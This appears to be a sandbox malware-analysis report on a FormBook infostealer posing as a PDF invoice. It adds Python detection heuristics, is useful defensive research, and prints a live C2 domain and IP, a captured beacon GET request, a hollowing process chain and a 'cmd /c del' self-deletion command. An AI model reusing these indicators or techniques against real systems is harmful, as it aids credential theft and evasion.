Nov 26, 2024 11:17:37.594098091 CET | 55539 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:17:37.833132029 CET | 53 | 55539 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:17:58.218943119 CET | 59183 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:17:58.450767994 CET | 53 | 59183 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:18:19.291780949 CET | 64227 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:18:19.509422064 CET | 53 | 64227 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:18:40.372323036 CET | 50033 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:18:40.593161106 CET | 53 | 50033 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:19:01.361736059 CET | 64063 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:19:01.730392933 CET | 53 | 64063 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 11:15:35.403584003 CET | 192.168.2.4 | 1.1.1.1 | 0xb4a1 | Standard query (0) | www.iddyspiderish.life | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:15:53.964972019 CET | 192.168.2.4 | 1.1.1.1 | 0x36e8 | Standard query (0) | www.fricaduka.store | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:14.435009956 CET | 192.168.2.4 | 1.1.1.1 | 0xa8c7 | Standard query (0) | www.iralcity.store | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:35.129565001 CET | 192.168.2.4 | 1.1.1.1 | 0xb31 | Standard query (0) | www.itchen-design-87997.bond | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:56.262780905 CET | 192.168.2.4 | 1.1.1.1 | 0xf14d | Standard query (0) | www.hetangosalon.net | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:16.927644968 CET | 192.168.2.4 | 1.1.1.1 | 0x6423 | Standard query (0) | www.loverhoodie.shop | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:37.594098091 CET | 192.168.2.4 | 1.1.1.1 | 0xa47d | Standard query (0) | www.vjoami3.xyz | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:58.218943119 CET | 192.168.2.4 | 1.1.1.1 | 0x5c9e | Standard query (0) | www.ryptocurrency-22237.bond | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:18:19.291780949 CET | 192.168.2.4 | 1.1.1.1 | 0xaf5d | Standard query (0) | www.iaokoa.net | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:18:40.372323036 CET | 192.168.2.4 | 1.1.1.1 | 0x3e73 | Standard query (0) | www.odgerlazerhats.net | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:19:01.361736059 CET | 192.168.2.4 | 1.1.1.1 | 0xaa2e | Standard query (0) | www.olconsulting.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 11:15:35.825655937 CET | 1.1.1.1 | 192.168.2.4 | 0xb4a1 | Name error (3) | www.iddyspiderish.life | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:15:54.329902887 CET | 1.1.1.1 | 192.168.2.4 | 0x36e8 | Name error (3) | www.fricaduka.store | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:14.665364981 CET | 1.1.1.1 | 192.168.2.4 | 0xa8c7 | Name error (3) | www.iralcity.store | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:35.537247896 CET | 1.1.1.1 | 192.168.2.4 | 0xb31 | Name error (3) | www.itchen-design-87997.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:16:56.466669083 CET | 1.1.1.1 | 192.168.2.4 | 0xf14d | Name error (3) | www.hetangosalon.net | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:17.494760036 CET | 1.1.1.1 | 192.168.2.4 | 0x6423 | No error (0) | www.loverhoodie.shop | loverhoodie.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 11:17:17.494760036 CET | 1.1.1.1 | 192.168.2.4 | 0x6423 | No error (0) | loverhoodie.shop | | 156.67.73.254 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:37.833132029 CET | 1.1.1.1 | 192.168.2.4 | 0xa47d | Name error (3) | www.vjoami3.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:17:58.450767994 CET | 1.1.1.1 | 192.168.2.4 | 0x5c9e | Name error (3) | www.ryptocurrency-22237.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:18:19.509422064 CET | 1.1.1.1 | 192.168.2.4 | 0xaf5d | Name error (3) | www.iaokoa.net | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:18:40.593161106 CET | 1.1.1.1 | 192.168.2.4 | 0x3e73 | Name error (3) | www.odgerlazerhats.net | none | none | A (IP address) | IN (0x0001) | false
Nov 26, 2024 11:19:01.730392933 CET | 1.1.1.1 | 192.168.2.4 | 0xaa2e | Name error (3) | www.olconsulting.xyz | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                    • www.loverhoodie.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49909 | 156.67.73.254 | 80 | 2580 | C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 26, 2024 11:17:17.620672941 CET167OUTGET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1
                                                                                                                    Host: www.loverhoodie.shop
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
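The five NXDOMAIN answers and the single plain-HTTP GET from explorer.exe are the whole network side of this report: FormBook walks a list of mostly dead decoy domains and beacons to the one that resolves with a short path and two query parameters. The Python below is an added example and is not part of the Joe Sandbox report nor FormBook's own code. It re-parses the DNS answers and the HTTP request (both transcribed from the tables above, the DNS rows pipe-delimited by hand) and applies two heuristics a detection engineer would derive from this page. The thresholds, the URI regular expression and all function names are assumptions chosen for the example, not a documented FormBook signature.

```python
import re
from collections import Counter

# DNS answers transcribed from the report's "DNS Answers" table (pipe-delimited
# by hand; the sandbox renders each answer as one run-together line).
DNS_ANSWERS = """\
Nov 26, 2024 11:17:37.833132029 CET|1.1.1.1|192.168.2.4|0xa47d|Name error (3)|www.vjoami3.xyz|none|none|A (IP address)|IN (0x0001)|false
Nov 26, 2024 11:17:58.450767994 CET|1.1.1.1|192.168.2.4|0x5c9e|Name error (3)|www.ryptocurrency-22237.bond|none|none|A (IP address)|IN (0x0001)|false
Nov 26, 2024 11:18:19.509422064 CET|1.1.1.1|192.168.2.4|0xaf5d|Name error (3)|www.iaokoa.net|none|none|A (IP address)|IN (0x0001)|false
Nov 26, 2024 11:18:40.593161106 CET|1.1.1.1|192.168.2.4|0x3e73|Name error (3)|www.odgerlazerhats.net|none|none|A (IP address)|IN (0x0001)|false
Nov 26, 2024 11:19:01.730392933 CET|1.1.1.1|192.168.2.4|0xaa2e|Name error (3)|www.olconsulting.xyz|none|none|A (IP address)|IN (0x0001)|false
"""
COLUMNS = ("timestamp", "src", "dst", "txid", "rcode", "name",
           "cname", "address", "type", "class", "doh")

# The one HTTP request the report captured, transcribed verbatim.
HTTP_REQUEST_LINE = ("GET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z"
                     "&DvcT5=gd64Xt4xCL HTTP/1.1")
HTTP_HEADERS = {"Host": "www.loverhoodie.shop", "Connection": "close"}
HTTP_PROCESS = r"C:\Windows\explorer.exe"


def parse_dns_answers(text):
    """Turn the pipe-delimited answer rows into dicts keyed by COLUMNS."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("|")
        if len(fields) != len(COLUMNS):
            raise ValueError(f"unexpected column count in {line!r}")
        rows.append(dict(zip(COLUMNS, fields)))
    return rows


def nxdomain_burst(rows, min_failed=4, min_tlds=3):
    """Flag a client that collects many NXDOMAIN answers spread over several TLDs.

    Thresholds are assumptions chosen for this example, not tuned values.
    """
    failed = [r for r in rows if r["rcode"].startswith("Name error")]
    tlds = Counter(r["name"].rsplit(".", 1)[-1] for r in failed)
    return {
        "failed": len(failed),
        "distinct_tlds": len(tlds),
        "hit": len(failed) >= min_failed and len(tlds) >= min_tlds,
    }


# Heuristic derived from the request on this page: short alphanumeric path,
# one long base64-looking parameter, one short trailing parameter.
BEACON_URI = re.compile(
    r"^/[a-z0-9]{2,6}/\?[A-Za-z0-9]{2,8}=[A-Za-z0-9+/=_-]{20,}"
    r"&[A-Za-z0-9]{2,8}=[A-Za-z0-9+/=_-]{4,}$"
)


def classify_http_request(request_line, headers, process):
    """Return the reasons a request looks like a C2 beacon (empty list if none)."""
    method, uri, _version = request_line.split(" ", 2)
    reasons = []
    if method == "GET" and BEACON_URI.match(uri):
        reasons.append("URI has the short-path/two-parameter beacon shape")
    if not any(k.lower() == "user-agent" for k in headers):
        reasons.append("no User-Agent header")
    if process.lower().endswith("\\explorer.exe"):
        reasons.append("sent by explorer.exe, which is not a browser")
    return reasons


def verdict(dns_text, request_line, headers, process):
    """True when the DNS burst and at least two request reasons coincide."""
    burst = nxdomain_burst(parse_dns_answers(dns_text))
    reasons = classify_http_request(request_line, headers, process)
    return burst["hit"] and len(reasons) >= 2


if __name__ == "__main__":
    print(nxdomain_burst(parse_dns_answers(DNS_ANSWERS)))
    print(classify_http_request(HTTP_REQUEST_LINE, HTTP_HEADERS, HTTP_PROCESS))
    print("beacon:", verdict(DNS_ANSWERS, HTTP_REQUEST_LINE, HTTP_HEADERS, HTTP_PROCESS))
```

Run against the rows above, `nxdomain_burst` reports 5 failures across 3 TLDs, and the explorer.exe request trips all three request reasons. On a real sensor the DNS check should be keyed per client IP and per time window (the five failures here span under two minutes), and the URI pattern alone will produce false positives on tracking pixels, so treat it as one signal to combine, as `verdict` does, rather than an alert on its own.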


                                                                                                                    Target ID:0
                                                                                                                    Start time:05:14:56
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
                                                                                                                    Imagebase:0x750000
                                                                                                                    File size:1'086'464 bytes
                                                                                                                    MD5 hash:A03815195E40A8CAF9E0DA80ECCB9240
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:05:14:57
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
                                                                                                                    Imagebase:0x970000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:05:14:58
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:15:00
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                                                                                                                    Imagebase:0xc20000
                                                                                                                    File size:61'440 bytes
                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:15:04
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                                    Imagebase:0x240000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:15:04
                                                                                                                    Start date:26/11/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true
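The process list above is the hollowing chain the signatures in the overview describe: the sample starts a 32-bit svchost.exe whose command line still names the original pdf.exe, explorer.exe (PID 2580, the process that later carries the C2 traffic) ends up with FormBook code in its memory, rundll32.exe runs with no arguments, and cmd.exe is asked to delete the svchost.exe image. The Python below is an added example, not part of the report or of any vendor rule set. It encodes four checks over process-creation records: command-line executable not matching the image, svchost.exe without a `-k` service group, rundll32.exe with no arguments (the Sigma rule the report cites), and cmd.exe deleting a file under System32 or SysWOW64. The image paths and command lines are transcribed from Target IDs 0 to 5 above; the record shape (`target`, `image`, `cmdline`) and all function names are assumptions standing in for a Sysmon or EDR event.

```python
import ntpath
import re

# Process records transcribed from the report's Target ID 0-5 entries. The
# record shape (target, image, cmdline) is a hypothetical stand-in for a
# Sysmon event 1 / EDR process-creation record.
EVENTS = [
    {"target": 0, "image": r"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"'},
    {"target": 1, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"'},
    {"target": 2, "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"target": 3, "image": r"C:\Windows\SysWOW64\rundll32.exe", "cmdline": r'"C:\Windows\SysWOW64\rundll32.exe"'},
    {"target": 4, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": r'/c del "C:\Windows\SysWOW64\svchost.exe"'},
    {"target": 5, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]


def split_cmdline(cmdline):
    """Split a Windows command line into (first token, remainder), honouring a quoted first token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    parts = s.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def base(path):
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def image_cmdline_mismatch(ev):
    """Hollowing tell: the command line names a different executable than the image on disk."""
    first, _ = split_cmdline(ev["cmdline"])
    if not first.lower().endswith(".exe"):
        return None  # command line does not start with an executable; nothing to compare
    if base(first) != base(ev["image"]):
        return f"command line names {ntpath.basename(first)} but image is {ntpath.basename(ev['image'])}"
    return None


def svchost_without_service_group(ev):
    """Legitimate svchost.exe instances are started by services.exe with -k <group>."""
    if base(ev["image"]) != "svchost.exe":
        return None
    if re.search(r"(?i)(^|\s)-k\s+\S+", ev["cmdline"]):
        return None
    return "svchost.exe started without -k <group>"


def rundll32_without_args(ev):
    """Mirror of the Sigma rule the report cites: rundll32.exe with no DLL or entry point."""
    if base(ev["image"]) != "rundll32.exe":
        return None
    _, rest = split_cmdline(ev["cmdline"])
    return None if rest else "rundll32.exe started with no DLL/entry point"


DEL_RE = re.compile(r'(?i)\bdel\b\s+"?([^"]+?)"?\s*$')
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


def deletes_system_binary(ev):
    """cmd.exe asked to delete a file under System32/SysWOW64 (here the hollowed svchost.exe)."""
    if base(ev["image"]) != "cmd.exe":
        return None
    m = DEL_RE.search(ev["cmdline"])
    if m and any(d in m.group(1).lower() for d in SYSTEM_DIRS):
        return f"cmd.exe deleting {m.group(1)}"
    return None


CHECKS = (image_cmdline_mismatch, svchost_without_service_group,
          rundll32_without_args, deletes_system_binary)


def triage(events):
    """Map each target ID to the list of reasons it was flagged (empty list = clean)."""
    result = {}
    for ev in events:
        result[ev["target"]] = [r for r in (chk(ev) for chk in CHECKS) if r]
    return result


if __name__ == "__main__":
    for target, reasons in triage(EVENTS).items():
        print(target, reasons or "-")
```

On these six records the original sample, explorer.exe and conhost.exe come back clean; the hollowed svchost.exe is flagged twice (wrong executable in its command line, no `-k` group), rundll32.exe once, and cmd.exe once for the delete. Note that the mismatch check only fires when the command line begins with an executable name, which is why the `/c del ...` record is judged by `deletes_system_binary` instead; a production rule would also want the parent process, which the report does not list per target.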


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                      Signature Coverage:6.9%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:175
execution_graph: [rendered node/edge listing omitted; the graph covers the CRT start-up and allocation helpers (DecodePointer/EncodePointer, RtlAllocateHeap/RtlFreeHeap, critical-section initialisation, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, RaiseException, GetModuleHandleExW/GetProcAddress/ExitProcess) and the sample's own start-up calls: RegOpenKeyExW/RegQueryValueExW/RegCloseKey, GetVersionExW, GetCurrentProcess/IsWow64Process, GetSystemInfo and GetNativeSystemInfo resolved via LoadLibraryA/GetProcAddress/FreeLibrary, GetStdHandle, OleInitialize, RegisterWindowMessageW, CreateThread/CloseHandle]
97672->97761 97674 779d30 97675 779d34 97674->97675 97763 779fca TlsAlloc 97674->97763 97762 779d9c 61 API calls 2 library calls 97675->97762 97678 779d39 97678->97639 97679 779d46 97679->97675 97680 779d51 97679->97680 97764 778a15 97680->97764 97683 779d93 97772 779d9c 61 API calls 2 library calls 97683->97772 97686 779d72 97686->97683 97688 779d78 97686->97688 97687 779d98 97687->97639 97771 779c73 58 API calls 4 library calls 97688->97771 97690 779d80 GetCurrentThreadId 97690->97639 97692 77d81e __alloc_osfhnd 97691->97692 97693 779e4b __lock 58 API calls 97692->97693 97694 77d825 97693->97694 97695 778a15 __calloc_crt 58 API calls 97694->97695 97697 77d836 97695->97697 97696 77d8a1 GetStartupInfoW 97704 77d8b6 97696->97704 97707 77d9e5 97696->97707 97697->97696 97698 77d841 __alloc_osfhnd @_EH4_CallFilterFunc@8 97697->97698 97698->97643 97699 77daad 97786 77dabd LeaveCriticalSection _doexit 97699->97786 97701 778a15 __calloc_crt 58 API calls 97701->97704 97702 77da32 GetStdHandle 97702->97707 97703 77da45 GetFileType 97703->97707 97704->97701 97705 77d904 97704->97705 97704->97707 97706 77d938 GetFileType 97705->97706 97705->97707 97784 77a06b InitializeCriticalSectionAndSpinCount 97705->97784 97706->97705 97707->97699 97707->97702 97707->97703 97785 77a06b InitializeCriticalSectionAndSpinCount 97707->97785 97711 777f43 97710->97711 97712 785184 97710->97712 97716 784d6b GetModuleFileNameW 97711->97716 97787 778a5d 58 API calls 2 library calls 97712->97787 97714 7851aa _memmove 97715 7851c0 FreeEnvironmentStringsW 97714->97715 97715->97711 97717 784d9f _wparse_cmdline 97716->97717 97719 784ddf _wparse_cmdline 97717->97719 97788 778a5d 58 API calls 2 library calls 97717->97788 97719->97650 97721 784fc1 __wsetenvp 97720->97721 97725 784fb9 97720->97725 97722 778a15 __calloc_crt 58 API calls 97721->97722 97730 784fea __wsetenvp 97722->97730 97723 785041 97724 772f95 _free 58 API calls 97723->97724 97724->97725 97725->97654 97726 778a15 __calloc_crt 58 API calls 
